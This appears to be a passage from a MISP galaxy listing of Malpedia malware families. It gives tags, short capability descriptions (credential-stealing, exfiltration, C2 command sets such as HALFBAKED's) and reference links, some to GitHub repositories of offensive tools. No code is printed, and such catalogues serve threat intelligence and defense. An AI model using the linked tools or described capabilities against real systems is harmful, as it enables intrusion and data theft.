The tag is: misp-galaxy:malpedia="RedHat Hacker WebShell"

RedHat Hacker WebShell is also known as:

Table 2708. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker

https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp

Silence DDoS

The tag is: misp-galaxy:malpedia="Silence DDoS"

Silence DDoS is also known as:

Table 2710. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos

https://www.group-ib.com/resources/threat-research/silence.html

BlackSun

Ransomware.

The tag is: misp-galaxy:malpedia="BlackSun"

BlackSun is also known as:

Table 2711. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.blacksun

https://blogs.vmware.com/security/2022/01/blacksun-ransomware-the-dark-side-of-powershell.html

FRat Loader

Loader used to deliver FRat (see family windows.frat)

The tag is: misp-galaxy:malpedia="FRat Loader"

FRat Loader is also known as:

Table 2715. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

Lazyscripter

The tag is: misp-galaxy:malpedia="Lazyscripter"

Lazyscripter is also known as:

Table 2719. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lazyscripter

https://github.com/SrujanKumar-K/Blogpost/tree/main/LazyScripter

LightBot

According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.

The tag is: misp-galaxy:malpedia="LightBot"

LightBot is also known as:

Table 2720. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot

https://twitter.com/VK_Intel/status/1329511151202349057

https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/

Octopus (Powershell)

The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."

It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.

The tag is: misp-galaxy:malpedia="Octopus (Powershell)"

Octopus (Powershell) is also known as:

Table 2721. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus

https://isc.sans.edu/diary/26918

https://github.com/mhaskar/Octopus

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf

https://isc.sans.edu/diary/rss/28628

PowerHarbor

PowerHarbor is a modular PowerShell-based malware that consists of various modules. The primary module maintains constant communication with the C2 server, executing and deleting additional modules received from it. Currently, the communication with the C2 server is encrypted using RSA encryption and hardcoded key data. Moreover, the main module incorporates virtual machine (VM) detection capabilities. The StealData module employs the Invoke-Stealer function as its core, enabling the theft of system information, browser-stored credentials, cryptocurrency wallet details, and credentials for various applications like Telegram, FileZilla, and WinSCP.

The tag is: misp-galaxy:malpedia="PowerHarbor"

PowerHarbor is also known as:

Table 2726. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerharbor

https://insight-jp.nttsecurity.com/post/102ignh/steelcloverpowerharbor

POWERPLANT

This powershell code is a PowerShell written backdoor used by FIN7. Regarding to Mandiant that is was revealed to be a "vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server."

The tag is: misp-galaxy:malpedia="POWERPLANT"

POWERPLANT is also known as:

Table 2729. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerplant

https://www.mandiant.com/resources/evolution-of-fin7

powershell_web_backdoor

The tag is: misp-galaxy:malpedia="powershell_web_backdoor"

powershell_web_backdoor is also known as:

Table 2730. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor

https://github.com/chrisjd20/powershell_web_backdoor

POWERSOURCE

POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.

The tag is: misp-galaxy:malpedia="POWERSOURCE"

POWERSOURCE is also known as:

Table 2733. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

PowerSpritz

The tag is: misp-galaxy:malpedia="PowerSpritz"

PowerSpritz is also known as:

Table 2734. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

POWERSTATS

POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.

The tag is: misp-galaxy:malpedia="POWERSTATS"

POWERSTATS is also known as:

  • Valyria

Table 2735. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats

https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA

https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/

https://web.archive.org/web/20180807105755/https://www.sekoia.fr/blog/falling-on-muddywater/

https://research.checkpoint.com/2019/the-muddy-waters-of-apt-attacks/

http://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

https://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://www.group-ib.com/blog/muddywater/

https://blog.prevailion.com/2020/01/summer-mirage.html

https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/

https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html

https://unit42.paloaltonetworks.com/atoms/boggyserpens/

https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater

https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/

https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf

https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611

https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

https://sec0wn.blogspot.com/2018/03/a-quick-dip-into-muddywaters-recent.html

https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html

https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf

https://securelist.com/apt-trends-report-q2-2019/91897/

https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html

https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/

https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

POWERTRASH

This PowerShell written malware is an in-memory dropper used by FIN7 to execute the included/embedded payload. According to Mandiant’s blog article: "POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub."

The tag is: misp-galaxy:malpedia="POWERTRASH"

POWERTRASH is also known as:

Table 2737. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powertrash

https://www.mandiant.com/resources/evolution-of-fin7

https://www.mandiant.com/resources/blog/evolution-of-fin7

PowerWare

The tag is: misp-galaxy:malpedia="PowerWare"

PowerWare is also known as:

Table 2738. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware

https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats

PowerZure

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

The tag is: misp-galaxy:malpedia="PowerZure"

PowerZure is also known as:

Table 2739. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure

https://github.com/hausec/PowerZure

PresFox

The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.

The tag is: misp-galaxy:malpedia="PresFox"

PresFox is also known as:

Table 2743. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox

https://twitter.com/kafeine/status/1092000556598677504

RMOT

According to Trellix, this is a first-stage, powershell-based malware dropped via Excel/VBS. It is able to establish a foothold and exfiltrate data. Targets identified include hotels in Macao.

The tag is: misp-galaxy:malpedia="RMOT"

RMOT is also known as:

Table 2745. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.rmot

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html

Royal Ransom (Powershell)

Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.

The tag is: misp-galaxy:malpedia="Royal Ransom (Powershell)"

Royal Ransom (Powershell) is also known as:

Table 2747. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.royal_ransom

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

Schtasks

The tag is: misp-galaxy:malpedia="Schtasks"

Schtasks is also known as:

Table 2748. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks

https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1

skyrat

The tag is: misp-galaxy:malpedia="skyrat"

skyrat is also known as:

Table 2749. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat

https://github.com/YSCHGroup/SkyRAT

sLoad

sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.

The tag is: misp-galaxy:malpedia="sLoad"

sLoad is also known as:

  • Starslord

Table 2750. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload

https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/

https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/

https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/

https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9

https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy

https://blog.minerva-labs.com/sload-targeting-europe-again

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/

https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/

https://threatpost.com/sload-spying-payload-delivery-bits/151120/

https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html

https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/

https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan

Tater PrivEsc

The tag is: misp-galaxy:malpedia="Tater PrivEsc"

Tater PrivEsc is also known as:

Table 2753. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater

https://github.com/Kevin-Robertson/Tater

ThunderShell

The tag is: misp-galaxy:malpedia="ThunderShell"

ThunderShell is also known as:

Table 2754. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell

https://github.com/Mr-Un1k0d3r/ThunderShell

Unidentified PS 001

Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.

The tag is: misp-galaxy:malpedia="Unidentified PS 001"

Unidentified PS 001 is also known as:

Table 2755. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001

https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/

Unidentified PS 002 (RAT)

A Powershell-based RAT capable of pulling further payloads, delivered through Russia-themed phishing mails.

The tag is: misp-galaxy:malpedia="Unidentified PS 002 (RAT)"

Unidentified PS 002 (RAT) is also known as:

Table 2756. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002

https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/

https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/

Unidentified PS 003 (RAT)

This malware is a RAT written in PowerShell. It has the following capabilities: Downloading and Uploading files, loading and execution of a PowerShell script, execution of a specific command. It was observed by Malwarebytes LABS Threat Intelligence Team in a newly discovered campaign: this campaigns tries to lure Germans with a promise of updates on the current threat situation in Ukraine according to Malwarebyte LABS.

The tag is: misp-galaxy:malpedia="Unidentified PS 003 (RAT)"

Unidentified PS 003 (RAT) is also known as:

Table 2757. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_003

https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

WannaRen Downloader

The tag is: misp-galaxy:malpedia="WannaRen Downloader"

WannaRen Downloader is also known as:

Table 2760. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader

https://twitter.com/blackorbird/status/1247834024711577601

WMImplant

The tag is: misp-galaxy:malpedia="WMImplant"

WMImplant is also known as:

Table 2761. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant

https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html

AndroxGh0st

According to Laceworks, this is a SMTP cracker, which is primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework and the Laravel .env file is often targeted for its various configuration data including AWS, SendGrid and Twilio. AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.

The tag is: misp-galaxy:malpedia="AndroxGh0st"

AndroxGh0st is also known as:

  • Androx

  • AndroxGhost

Table 2762. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.androxgh0st

https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/

Archivist

The tag is: misp-galaxy:malpedia="Archivist"

Archivist is also known as:

Table 2763. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist

https://github.com/NullArray/Archivist

DropboxC2C

The tag is: misp-galaxy:malpedia="DropboxC2C"

DropboxC2C is also known as:

Table 2766. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c

https://github.com/0x09AL/DropboxC2C

Empyrean

Discord Stealer written in Python with Javascript-based inject files.

The tag is: misp-galaxy:malpedia="Empyrean"

Empyrean is also known as:

Table 2767. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.empyrean

https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord

Guard

According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.

The tag is: misp-galaxy:malpedia="Guard"

Guard is also known as:

Table 2768. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.guard

https://securelist.com/wildpressure-targets-macos/103072/

InvisibleFerret

The tag is: misp-galaxy:malpedia="InvisibleFerret"

InvisibleFerret is also known as:

Table 2769. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.invisibleferret

https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/

KeyPlexer

The tag is: misp-galaxy:malpedia="KeyPlexer"

KeyPlexer is also known as:

Table 2770. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer

https://github.com/nairuzabulhul/KeyPlexer

Lofy

The tag is: misp-galaxy:malpedia="Lofy"

Lofy is also known as:

  • LofyLife

Table 2772. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.lofy

https://securelist.com/lofylife-malicious-npm-packages/107014/

Loki RAT

This RAT written in Python is an open-source fork of the Ares RAT. This malware integrates additional modules, like recording, lockscreen, and locate options. It was used in a customized form version by El Machete APT in an ongoing champaign since 2020. The original code can be found at: https://github.com/TheGeekHT/Loki.Rat/

The tag is: misp-galaxy:malpedia="Loki RAT"

Loki RAT is also known as:

Table 2773. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.lokirat

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

MASEPIE

The tag is: misp-galaxy:malpedia="MASEPIE"

MASEPIE is also known as:

Table 2774. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.masepie

https://cert.gov.ua/article/6276894

NetWorm

The tag is: misp-galaxy:malpedia="NetWorm"

NetWorm is also known as:

Table 2776. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.networm

https://github.com/pylyf/NetWorm

PIRAT

The tag is: misp-galaxy:malpedia="PIRAT"

PIRAT is also known as:

Table 2777. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat

https://vk.com/m228228?w=wall306895781_177

PyAesLoader

The tag is: misp-galaxy:malpedia="PyAesLoader"

PyAesLoader is also known as:

Table 2781. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader

PY#RATION

According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its utilization of websockets for both command and control (C2) communication and exfiltration as well as how it evades detection from antivirus and network security measures.

The tag is: misp-galaxy:malpedia="PY#RATION"

PY#RATION is also known as:

Table 2784. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.pyration

https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

The tag is: misp-galaxy:malpedia="Responder"

Responder is also known as:

  • SpiderLabs Responder

Table 2786. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.responder

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://github.com/lgandx/Responder

SpaceCow

The tag is: misp-galaxy:malpedia="SpaceCow"

SpaceCow is also known as:

Table 2789. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow

https://github.com/TheSph1nx/SpaceCow

stealler

The tag is: misp-galaxy:malpedia="stealler"

stealler is also known as:

Table 2790. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler

https://habr.com/en/sandbox/135410/

unidentified_002

The tag is: misp-galaxy:malpedia="unidentified_002"

unidentified_002 is also known as:

Table 2792. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002

unidentified_003

The tag is: misp-galaxy:malpedia="unidentified_003"

unidentified_003 is also known as:

Table 2793. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003

Venomous

Ransomware written in Python and delivered as compiled executable created using PyInstaller.

The tag is: misp-galaxy:malpedia="Venomous"

Venomous is also known as:

Table 2794. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.venomous

https://blog.cyble.com/2021/08/04/a-deep-dive-analysis-of-venomous-ransomware/

Venus Stealer

Venus Stealer is a python based Infostealer observed early 2023.

The tag is: misp-galaxy:malpedia="Venus Stealer"

Venus Stealer is also known as:

Table 2795. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.venus_stealer

https://twitter.com/0xToxin/status/1625435116771180546

https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/

W4SP Stealer

The tag is: misp-galaxy:malpedia="W4SP Stealer"

W4SP Stealer is also known as:

Table 2796. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.w4sp_stealer

https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/

KV

The tag is: misp-galaxy:malpedia="KV"

KV is also known as:

Table 2797. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/sh.kv

https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/

FlexiSpy (symbian)

The tag is: misp-galaxy:malpedia="FlexiSpy (symbian)"

FlexiSpy (symbian) is also known as:

Table 2798. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy

https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

CageyChameleon

CageyChameleon Malware is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon will collect user host information, system current process information, etc. The collected information is sent back to the C2 server, and continue to initiate requests to perform subsequent operations.

The tag is: misp-galaxy:malpedia="CageyChameleon"

CageyChameleon is also known as:

  • Cabbage RAT

Table 2799. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon

https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf

https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/

https://www.clearskysec.com/cryptocore-group/

https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG

https://sansorg.egnyte.com/dl/3P3HxFiNgL

https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/

https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314

https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/

https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ

https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html

https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf

https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md

https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html

GGLdr

The tag is: misp-galaxy:malpedia="GGLdr"

GGLdr is also known as:

Table 2801. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr

https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control

GlowSpark

The tag is: misp-galaxy:malpedia="GlowSpark"

GlowSpark is also known as:

Table 2802. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.glowspark

https://inquest.net/blog/2022/02/10/380-glowspark

HALFBAKED

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:

info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI
        queries
processList: Send list of process running
screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
runvbs: Executes a VB script
runexe: Executes EXE file
runps1: Executes PowerShell script
delete: Delete the specified file
update: Update the specified file

The tag is: misp-galaxy:malpedia="HALFBAKED"

HALFBAKED is also known as:

Table 2804. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://attack.mitre.org/software/S0151/

Iloveyou

The tag is: misp-galaxy:malpedia="Iloveyou"

Iloveyou is also known as:

  • Love Bug

  • LoveLetter

Table 2805. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou

https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186

Janicab (VBScript)

The tag is: misp-galaxy:malpedia="Janicab (VBScript)"

Janicab (VBScript) is also known as:

Table 2806. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.janicab

https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/

lampion

Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files. The malware targets banking clients in Portugal.

The tag is: misp-galaxy:malpedia="lampion"

lampion is also known as:

Table 2807. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion

https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/

https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/

https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf

https://www.layer8.pt/PDFs/New%20Lampion%20banking%20Trojan%20variant%20in%20the%20wild.pdf

https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing

https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader

https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/

https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/

https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html

https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years

LitterDrifter

The tag is: misp-galaxy:malpedia="LitterDrifter"

LitterDrifter is also known as:

Table 2808. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.litterdrifter

https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/

MOUSEISLAND

MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email. Based on Fireeye intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID.

The tag is: misp-galaxy:malpedia="MOUSEISLAND"

MOUSEISLAND is also known as:

Table 2810. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.mouseisland

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

NodeJS Ransomware

Downloads NodeJS when deployed.

The tag is: misp-galaxy:malpedia="NodeJS Ransomware"

NodeJS Ransomware is also known as:

Table 2811. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom

https://dissectingmalwa.re/the-opposite-of-fileless-malware-nodejs-ransomware.html

RandomQuery

According to SentinelLabs, this is a VisualBasic-based malware that gathers system and file information and exfiltrates the data using InternetExplorer.Application or Microsoft.XMLHTTP objects.

The tag is: misp-galaxy:malpedia="RandomQuery"

RandomQuery is also known as:

Table 2812. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.randomquery

https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/

Starfighter (VBScript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

The tag is: misp-galaxy:malpedia="Starfighter (VBScript)"

Starfighter (VBScript) is also known as:

Table 2813. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starfighter

https://github.com/Cn33liz/StarFighters

Unidentified VBS 001

The tag is: misp-galaxy:malpedia="Unidentified VBS 001"

Unidentified VBS 001 is also known as:

Table 2815. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001

https://twitter.com/JohnLaTwC/status/1118278148993339392

Unidentified 002 (Operation Kremlin)

Unnamed malware. Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.

The tag is: misp-galaxy:malpedia="Unidentified 002 (Operation Kremlin)"

Unidentified 002 (Operation Kremlin) is also known as:

Table 2816. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_002

https://www.clearskysec.com/operation-kremlin/

Unidentified VBS 004 (RAT)

Lab52 describes this as a light first-stage RAT used by MuddyWater and observed samples between at least November 2020 and January 2022.

The tag is: misp-galaxy:malpedia="Unidentified VBS 004 (RAT)"

Unidentified VBS 004 (RAT) is also known as:

Table 2818. Table References

Links

